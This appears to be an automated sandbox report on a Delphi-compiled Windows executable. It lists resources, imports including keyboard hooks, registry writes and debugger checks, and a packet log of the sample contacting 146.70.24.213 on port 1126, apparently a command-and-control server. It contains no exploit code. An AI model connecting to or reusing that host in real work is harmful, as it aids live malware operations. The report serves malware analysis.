RT_STRING	0x531eac	0x378	data			0.43243243243243246
RT_STRING	0x532224	0x390	data			0.39144736842105265
RT_STRING	0x5325b4	0x2f0	data			0.4242021276595745
RT_STRING	0x5328a4	0x488	data			0.3905172413793103
RT_STRING	0x532d2c	0x4e4	data			0.39217252396166136
RT_STRING	0x533210	0x3a4	data			0.4034334763948498
RT_STRING	0x5335b4	0x34c	data			0.40165876777251186
RT_STRING	0x533900	0x390	data			0.3355263157894737
RT_STRING	0x533c90	0x3e0	data			0.43850806451612906
RT_STRING	0x534070	0x38c	data			0.31167400881057267
RT_STRING	0x5343fc	0x3e0	data			0.42439516129032256
RT_STRING	0x5347dc	0x184	data			0.5412371134020618
RT_STRING	0x534960	0xd4	data			0.660377358490566
RT_STRING	0x534a34	0x214	data			0.5
RT_STRING	0x534c48	0x3c8	data			0.3822314049586777
RT_STRING	0x535010	0x3f4	data			0.391304347826087
RT_STRING	0x535404	0x47c	data			0.3423344947735192
RT_STRING	0x535880	0x28c	data			0.34662576687116564
RT_STRING	0x535b0c	0x454	data			0.41064981949458484
RT_STRING	0x535f60	0x4b4	data			0.3953488372093023
RT_STRING	0x536414	0x4cc	data			0.34446254071661236
RT_STRING	0x5368e0	0x3b0	data			0.3792372881355932
RT_STRING	0x536c90	0x3d8	data			0.34146341463414637
RT_STRING	0x537068	0x35c	data			0.37906976744186044
RT_STRING	0x5373c4	0xd0	data			0.5721153846153846
RT_STRING	0x537494	0xa0	data			0.65
RT_STRING	0x537534	0x394	data			0.4268558951965066
RT_STRING	0x5378c8	0x434	data			0.3308550185873606
RT_STRING	0x537cfc	0x390	data			0.37609649122807015
RT_STRING	0x53808c	0x2dc	data			0.38114754098360654
RT_STRING	0x538368	0x34c	data			0.3246445497630332
RT_RCDATA	0x5386b4	0x10	data			1.5
RT_RCDATA	0x5386c4	0x3bbb7	data	English	United States	0.6175269656629732
RT_RCDATA	0x57427c	0xb78	data			0.4778610354223433
RT_RCDATA	0x574df4	0x151	Delphi compiled form 'TForm1'			0.7210682492581603
RT_GROUP_CURSOR	0x574f48	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.25
RT_GROUP_CURSOR	0x574f5c	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.25
RT_GROUP_CURSOR	0x574f70	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x574f84	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x574f98	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x574fac	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x574fc0	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_ICON	0x574fd4	0x5a	data			0.7
RT_VERSION	0x575030	0x368	data	English	United States	0.44954128440366975

Imports

DLL	Import
oleaut32.dll	SysFreeString, SysReAllocStringLen, SysAllocStringLen
advapi32.dll	RegQueryValueExW, RegOpenKeyExW, RegCloseKey
user32.dll	CharNextW, LoadStringW
kernel32.dll	Sleep, VirtualFree, VirtualAlloc, lstrlenW, VirtualQuery, QueryPerformanceCounter, GetTickCount, GetSystemInfo, GetVersion, CompareStringW, IsDBCSLeadByteEx, IsValidLocale, SetThreadLocale, GetSystemDefaultUILanguage, GetUserDefaultUILanguage, GetLocaleInfoW, WideCharToMultiByte, MultiByteToWideChar, GetConsoleOutputCP, GetConsoleCP, GetACP, LoadLibraryExW, GetStartupInfoW, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetCommandLineW, FreeLibrary, GetLastError, UnhandledExceptionFilter, RtlUnwindEx, RtlUnwind, RaiseException, ExitProcess, ExitThread, SwitchToThread, GetCurrentThreadId, CreateThread, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, FindFirstFileW, FindClose, WriteFile, SetFilePointer, SetEndOfFile, ReadFile, GetFileType, GetFileSize, CreateFileW, GetStdHandle, CloseHandle
kernel32.dll	GetProcAddress, RaiseException, LoadLibraryA, GetLastError, TlsSetValue, TlsGetValue, LocalFree, LocalAlloc, GetModuleHandleW, FreeLibrary
user32.dll	SetClassLongPtrW, GetClassLongPtrW, SetWindowLongPtrW, GetWindowLongPtrW, CreateWindowExW, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassW, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoW, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCaret, SetWindowRgn, SetWindowsHookExW, SetWindowTextW, SetWindowPos, SetWindowPlacement, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropW, SetParent, SetMenuItemInfoW, SetMenu, SetForegroundWindow, SetFocus, SetCursorPos, SetCursor, SetClipboardData, SetCapture, SetActiveWindow, SendMessageA, SendMessageW, ScrollWindow, ScreenToClient, RemovePropW, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageW, RegisterClipboardFormatW, RegisterClassW, RedrawWindow, PostQuitMessage, PostMessageW, PeekMessageA, PeekMessageW, OpenClipboard, MsgWaitForMultipleObjectsEx, MsgWaitForMultipleObjects, MessageBoxW, MessageBeep, MapWindowPoints, MapVirtualKeyW, LoadStringW, LoadKeyboardLayoutW, LoadIconW, LoadCursorW, LoadBitmapW, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsIconic, IsDialogMessageA, IsDialogMessageW, IsChild, InvalidateRect, InsertMenuItemW, InsertMenuW, HideCaret, GetWindowThreadProcessId, GetWindowTextW, GetWindowRect, GetWindowPlacement, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetScrollBarInfo, GetPropW, GetParent, GetWindow, GetMessagePos, GetMessageExtraInfo, GetMenuStringW, GetMenuState, GetMenuItemInfoW, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameW, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextW, GetIconInfo, GetForegroundWindow, GetFocus, GetDlgCtrlID, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameW, GetClassInfoExW, GetClassInfoW, GetCapture, GetActiveWindow, FrameRect, FindWindowExW, FindWindowW, FillRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EndMenu, EnableWindow, EnableScrollBar, EnableMenuItem, EmptyClipboard, DrawTextExW, DrawTextW, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageA, DispatchMessageW, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcW, DefMDIChildProcW, DefFrameProcW, CreatePopupMenu, CreateMenu, CreateIcon, CreateAcceleratorTableW, CopyImage, CopyIcon, CloseClipboard, ClientToScreen, CheckMenuItem, CharUpperBuffW, CharUpperW, CharNextW, CharLowerBuffW, CharLowerW, CallWindowProcW, CallNextHookEx, BeginPaint, AdjustWindowRectEx, ActivateKeyboardLayout
gdi32.dll	UnrealizeObject, StretchDIBits, StretchBlt, StartPage, StartDocW, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetRectRgn, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SetAbortProc, SelectPalette, SelectObject, SaveDC, RoundRect, RestoreDC, Rectangle, RectVisible, RealizePalette, Polyline, Polygon, PolyBezierTo, PolyBezier, PlayEnhMetaFile, Pie, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsW, GetTextExtentPointW, GetTextExtentPoint32W, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectW, GetMapMode, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileDescriptionW, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, FrameRgn, ExtTextOutW, ExtFloodFill, ExcludeClipRect, EnumFontsW, EnumFontFamiliesExW, EndPage, EndDoc, Ellipse, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreateRectRgn, CreatePenIndirect, CreatePalette, CreateICW, CreateHalftonePalette, CreateFontIndirectW, CreateDIBitmap, CreateDIBSection, CreateDCW, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileW, Chord, BitBlt, ArcTo, Arc, AngleArc, AbortDoc
version.dll	VerQueryValueW, GetFileVersionInfoSizeW, GetFileVersionInfoW
kernel32.dll	WriteFile, WideCharToMultiByte, WaitForSingleObject, WaitForMultipleObjectsEx, VirtualQueryEx, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, VerSetConditionMask, VerifyVersionInfoW, TryEnterCriticalSection, SwitchToThread, SuspendThread, Sleep, SizeofResource, SetThreadPriority, SetThreadLocale, SetLastError, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResumeThread, ResetEvent, ReadFile, RaiseException, QueryPerformanceFrequency, QueryPerformanceCounter, IsDebuggerPresent, MulDiv, LockResource, LocalFree, LoadResource, LoadLibraryW, LeaveCriticalSection, LCMapStringW, IsValidLocale, InitializeCriticalSection, HeapSize, HeapFree, HeapDestroy, HeapCreate, HeapAlloc, GlobalUnlock, GlobalLock, GlobalFree, GlobalFindAtomW, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomW, GetVersionExW, GetVersion, GetTimeZoneInformation, GetTickCount, GetThreadPriority, GetThreadLocale, GetStdHandle, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetLocaleInfoW, GetLocalTime, GetLastError, GetFullPathNameW, GetFileSize, GetFileAttributesW, GetExitCodeThread, GetDiskFreeSpaceW, GetDateFormatW, GetCurrentThreadId, GetCurrentThread, GetCurrentProcessId, GetCurrentProcess, GetCPInfoExW, GetCPInfo, GetACP, FreeResource, FreeLibrary, FormatMessageW, FindResourceW, FindFirstFileW, FindClose, EnumSystemLocalesW, EnumResourceNamesW, EnumCalendarInfoW, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileW, CreateEventW, CompareStringW, CloseHandle
advapi32.dll	RegUnLoadKeyW, RegSetValueExW, RegSaveKeyW, RegRestoreKeyW, RegReplaceKeyW, RegQueryValueExW, RegQueryInfoKeyW, RegOpenKeyExW, RegLoadKeyW, RegFlushKey, RegEnumValueW, RegEnumKeyExW, RegDeleteValueW, RegDeleteKeyW, RegCreateKeyExW, RegConnectRegistryW, RegCloseKey
kernel32.dll	Sleep
oleaut32.dll	SafeArrayGetElemsize, SafeArrayPtrOfIndex, SafeArrayPutElement, SafeArrayGetElement, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
oleaut32.dll	GetErrorInfo, SysFreeString
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoTaskMemAlloc, CoCreateInstance, CoUninitialize, CoInitialize, IsEqualGUID
comctl32.dll	InitializeFlatSB, FlatSB_SetScrollProp, FlatSB_SetScrollPos, FlatSB_SetScrollInfo, FlatSB_GetScrollPos, FlatSB_GetScrollInfo, _TrackMouseEvent, ImageList_GetImageInfo, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Copy, ImageList_LoadImageW, ImageList_GetIcon, ImageList_Remove, ImageList_DrawEx, ImageList_Replace, ImageList_Draw, ImageList_SetOverlayImage, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_SetImageCount, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
user32.dll	EnumDisplayMonitors, GetMonitorInfoW, MonitorFromPoint, MonitorFromRect, MonitorFromWindow
shell32.dll	Shell_NotifyIconW
winspool.drv	OpenPrinterW, EnumPrintersW, DocumentPropertiesW, ClosePrinter
winspool.drv	GetDefaultPrinterW

Exports

Name	Ordinal	Address
TMethodImplementationIntercept	3	0x4991b0
__dbk_fcall_wrapper	2	0x417300
dbkFCallWrapperAddr	1	0x8a1f58

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 12, 2024 20:30:00.399132013 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:00.404023886 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:00.404205084 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:00.404987097 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:00.414812088 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:00.883095026 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:00.929819107 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:02.917604923 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:02.922460079 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:02.922538042 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:02.927318096 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.051928997 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.101763010 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:03.144721985 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.146791935 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:03.152003050 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.152211905 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:03.157188892 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.265583038 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.320375919 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:03.398209095 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.398663044 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:03.403740883 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.403822899 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:03.408830881 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.410028934 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:03.414997101 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.415083885 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:03.419981956 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.526123047 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:03.531107903 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.531157970 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:03.535962105 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.656977892 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.657099962 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.657162905 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:03.657176018 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.657193899 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.657202959 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.657211065 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.657259941 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:03.657666922 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.657702923 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.657736063 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.657772064 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:03.658003092 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.658051014 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:03.658058882 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.658111095 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.658144951 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.658154011 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:03.658180952 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.658243895 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:03.659364939 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.662022114 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.662075043 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:03.749943972 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.750000954 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.750015974 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.750031948 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.750041962 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:03.750046968 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.750062943 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.750067949 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:03.750077963 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.750118017 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:03.750277042 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.750324011 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.750327110 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:03.750350952 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.750369072 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.750382900 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.750391006 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:03.750416994 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:03.750888109 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.750982046 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.750996113 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.751009941 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.751024008 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.751029968 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:03.751039982 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.751054049 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:03.751060009 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.751094103 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:03.751804113 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.751832008 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.751841068 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:03.751847029 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.751877069 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:03.794157028 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.794208050 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.794245958 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.794271946 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:03.836324930 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:03.842551947 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.842571020 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.842593908 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.842614889 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.842631102 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.842648029 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.842730999 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:03.842731953 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:03.842731953 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:03.842825890 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.842842102 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.842855930 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.842870951 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.842881918 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:03.842911959 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:03.843389988 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.843414068 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.843430042 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.843445063 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.843461037 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.843540907 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:03.843540907 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:03.844058037 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.844073057 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.844088078 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.844103098 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.844113111 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:03.844119072 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.844134092 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.844137907 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:03.844150066 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.844165087 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.844187021 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:03.844206095 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:03.844816923 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.844831944 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.844856024 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.844855070 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:03.844880104 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.844896078 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.844902039 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:03.844909906 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.844927073 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.844932079 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:03.844942093 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.844969034 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:03.845707893 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.845722914 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.845737934 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.845746040 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:03.845786095 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.845789909 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:03.845802069 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.845817089 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.845832109 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.845843077 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:03.845855951 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.845869064 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:03.846546888 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.846599102 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:03.846626997 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.887641907 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.887701988 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.887702942 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:03.887738943 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.887772083 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.887783051 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:03.887806892 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.887861013 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:03.896444082 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:03.901349068 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.901407003 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:03.906316996 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.943564892 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:03.948412895 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:03.948493004 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:03.953331947 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.055258036 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.061501026 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.063417912 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.070102930 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.391887903 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.392307997 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.392339945 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.392390966 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.392424107 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.392457008 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.392467022 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.392467022 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.392564058 CEST	1126	49710	146.70.24.213	192.168.2.6
